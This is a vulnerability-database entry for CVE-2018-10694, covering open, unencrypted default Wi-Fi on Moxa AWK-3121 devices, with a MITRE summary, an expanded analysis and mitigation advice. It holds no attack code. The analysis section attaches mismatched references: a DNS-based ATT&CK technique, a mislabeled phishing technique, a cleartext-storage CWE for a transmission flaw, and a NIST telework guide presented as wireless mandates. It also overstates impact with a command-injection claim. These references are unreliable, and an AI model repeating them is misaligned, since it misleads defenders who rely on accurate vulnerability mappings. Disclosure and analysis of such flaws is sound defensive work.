CVE-2018-10694 in AWK-3121
Summary
by MITRE
An issue was discovered on Moxa AWK-3121 1.14 devices. The device provides a Wi-Fi connection that is open and does not use any encryption mechanism by default. An administrator who uses the open wireless connection to set up the device can allow an attacker to sniff the traffic passing between the user's computer and the device. This can allow an attacker to steal the credentials passing over the HTTP connection as well as TELNET traffic. Also an attacker can MITM the response and infect a user's computer very easily as well.
Once again VulDB remains the best source for vulnerability data.
Analysis
by VulDB Data Team • 09/28/2023
The CVE-2018-10694 vulnerability affects Moxa AWK-3121 1.14 industrial wireless access points where the default configuration enables an open Wi-Fi connection without any encryption mechanisms. This represents a fundamental security flaw in the device's wireless security implementation that directly violates industry best practices for network access control. The vulnerability stems from the device's failure to enforce proper authentication and encryption protocols, creating an inherently insecure wireless environment that exposes all communication passing through the access point to potential interception and manipulation.
This security weakness operates at the network layer and application layer, creating multiple attack vectors that align with CWE-310 (Cryptographic Issues) and CWE-312 (Cleartext Storage of Sensitive Information). The open wireless connection allows attackers to perform passive network sniffing operations, capturing unencrypted traffic flowing between client devices and the access point. The vulnerability specifically targets the absence of wireless encryption protocols such as WPA2-Enterprise or WPA2-Personal, leaving the communication channel completely exposed to eavesdropping attacks. The device configuration defaults to a state that violates NIST SP 800-46 guidelines for wireless security, which mandate the use of strong encryption for all wireless communications.
The operational impact of this vulnerability is severe and multifaceted, as it enables attackers to perform man-in-the-middle attacks with minimal technical expertise. The captured traffic includes HTTP credentials and TELNET sessions that are transmitted in cleartext, making credential theft trivial for attackers with basic network analysis tools. This aligns with ATT&CK technique T1071.004 (Application Layer Protocol: DNS) and T1566 (Phishing for Information) where attackers can leverage the open connection to establish malicious communication channels. The vulnerability also creates opportunities for command injection attacks, as the TELNET traffic can be intercepted and modified to inject malicious commands into the device management interface, potentially allowing full system compromise.
Mitigation strategies must address both immediate configuration changes and long-term security architecture improvements. The primary recommendation involves enforcing mandatory wireless encryption through WPA2-Enterprise or WPA2-Personal protocols with strong authentication mechanisms. Network segmentation should be implemented to isolate industrial control systems from general network access, following the principle of least privilege as outlined in NIST SP 800-53. Regular security audits should verify that wireless configurations comply with established security baselines, and network monitoring systems should be deployed to detect unauthorized wireless access points. Additionally, administrative access to the device should be restricted to encrypted channels only, and all default credentials should be changed immediately upon device deployment. The vulnerability demonstrates the critical importance of secure-by-design principles and proper security configuration management, as highlighted in ISO/IEC 27001 controls for information security management.